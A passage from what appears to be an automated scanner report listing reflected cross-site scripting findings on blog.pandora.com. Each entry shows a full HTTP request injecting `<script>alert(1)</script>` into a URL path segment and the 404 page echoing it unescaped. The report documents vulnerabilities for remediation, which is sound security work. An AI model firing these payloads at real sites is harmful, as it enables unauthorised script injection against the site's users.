Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora685f7<script>alert(1)</script>b71e5ef0a26/archives/2008/11/ was not found on this server.</p>
...[SNIP]...

1.164. http://blog.pandora.com/pandora/archives/2008/11/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/11/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bce64<script>alert(1)</script>e78182be82 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesbce64<script>alert(1)</script>e78182be82/2008/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:59 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesbce64<script>alert(1)</script>e78182be82/2008/11/ was not found on this server.</p>
...[SNIP]...

1.165. http://blog.pandora.com/pandora/archives/2008/11/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/11/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6e4b2<script>alert(1)</script>1ff330e9b26 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20086e4b2<script>alert(1)</script>1ff330e9b26/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:04 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20086e4b2<script>alert(1)</script>1ff330e9b26/11/ was not found on this server.</p>
...[SNIP]...

1.166. http://blog.pandora.com/pandora/archives/2008/11/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/11/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3a15c<script>alert(1)</script>5c048a41cfa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/113a15c<script>alert(1)</script>5c048a41cfa/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:09 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/113a15c<script>alert(1)</script>5c048a41cfa/ was not found on this server.</p>
...[SNIP]...

1.167. http://blog.pandora.com/pandora/archives/2008/12/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/12/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8089c<script>alert(1)</script>6c11535c8eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora8089c<script>alert(1)</script>6c11535c8eb/archives/2008/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora8089c<script>alert(1)</script>6c11535c8eb/archives/2008/12/ was not found on this server.</p>
...[SNIP]...

1.168. http://blog.pandora.com/pandora/archives/2008/12/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/12/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7be86<script>alert(1)</script>858dc5f1838 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives7be86<script>alert(1)</script>858dc5f1838/2008/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:39 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives7be86<script>alert(1)</script>858dc5f1838/2008/12/ was not found on this server.</p>
...[SNIP]...

1.169. http://blog.pandora.com/pandora/archives/2008/12/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/12/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9cdec<script>alert(1)</script>3afc3bd0abd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20089cdec<script>alert(1)</script>3afc3bd0abd/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:42 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20089cdec<script>alert(1)</script>3afc3bd0abd/12/ was not found on this server.</p>
...[SNIP]...

1.170. http://blog.pandora.com/pandora/archives/2008/12/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/12/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6330d<script>alert(1)</script>5cbccb3c131 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/126330d<script>alert(1)</script>5cbccb3c131/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:45 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/126330d<script>alert(1)</script>5cbccb3c131/ was not found on this server.</p>
...[SNIP]...

1.171. http://blog.pandora.com/pandora/archives/2009/01/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/01/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9e242<script>alert(1)</script>c3f15fa67f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora9e242<script>alert(1)</script>c3f15fa67f4/archives/2009/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:55 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora9e242<script>alert(1)</script>c3f15fa67f4/archives/2009/01/ was not found on this server.</p>
...[SNIP]...

1.172. http://blog.pandora.com/pandora/archives/2009/01/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/01/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 89b64<script>alert(1)</script>b2d3b4a18a8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives89b64<script>alert(1)</script>b2d3b4a18a8/2009/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives89b64<script>alert(1)</script>b2d3b4a18a8/2009/01/ was not found on this server.</p>
...[SNIP]...

1.173. http://blog.pandora.com/pandora/archives/2009/01/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/01/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7feb3<script>alert(1)</script>350dc8da11b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20097feb3<script>alert(1)</script>350dc8da11b/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:01 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20097feb3<script>alert(1)</script>350dc8da11b/01/ was not found on this server.</p>
...[SNIP]...

1.174. http://blog.pandora.com/pandora/archives/2009/01/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/01/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b4d46<script>alert(1)</script>419734980f5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009/01b4d46<script>alert(1)</script>419734980f5/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:06 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/01b4d46<script>alert(1)</script>419734980f5/ was not found on this server.</p>
...[SNIP]...

1.175. http://blog.pandora.com/pandora/archives/2009/02/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/02/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4d541<script>alert(1)</script>2442df8266b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora4d541<script>alert(1)</script>2442df8266b/archives/2009/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:35 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora4d541<script>alert(1)</script>2442df8266b/archives/2009/02/ was not found on this server.</p>
...[SNIP]...

1.176. http://blog.pandora.com/pandora/archives/2009/02/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/02/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4a4a2<script>alert(1)</script>ff59d7e80db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives4a4a2<script>alert(1)</script>ff59d7e80db/2009/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives4a4a2<script>alert(1)</script>ff59d7e80db/2009/02/ was not found on this server.</p>
...[SNIP]...

1.177. http://blog.pandora.com/pandora/archives/2009/02/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/02/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 714ce<script>alert(1)</script>bf225eb4a1f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009714ce<script>alert(1)</script>bf225eb4a1f/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:39 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009714ce<script>alert(1)</script>bf225eb4a1f/02/ was not found on this server.</p>
...[SNIP]...

1.178. http://blog.pandora.com/pandora/archives/2009/02/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/02/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 92265<script>alert(1)</script>2c48c4d86bc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009/0292265<script>alert(1)</script>2c48c4d86bc/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:43 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/0292265<script>alert(1)</script>2c48c4d86bc/ was not found on this server.</p>
...[SNIP]...

1.179. http://blog.pandora.com/pandora/archives/2009/03/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/03/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload efa04<script>alert(1)</script>a909529678b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoraefa04<script>alert(1)</script>a909529678b/archives/2009/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:41 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraefa04<script>alert(1)</script>a909529678b/archives/2009/03/ was not found on this server.</p>
...[SNIP]...

1.180. http://blog.pandora.com/pandora/archives/2009/03/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/03/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bc94c<script>alert(1)</script>9dc1dabafdc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesbc94c<script>alert(1)</script>9dc1dabafdc/2009/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
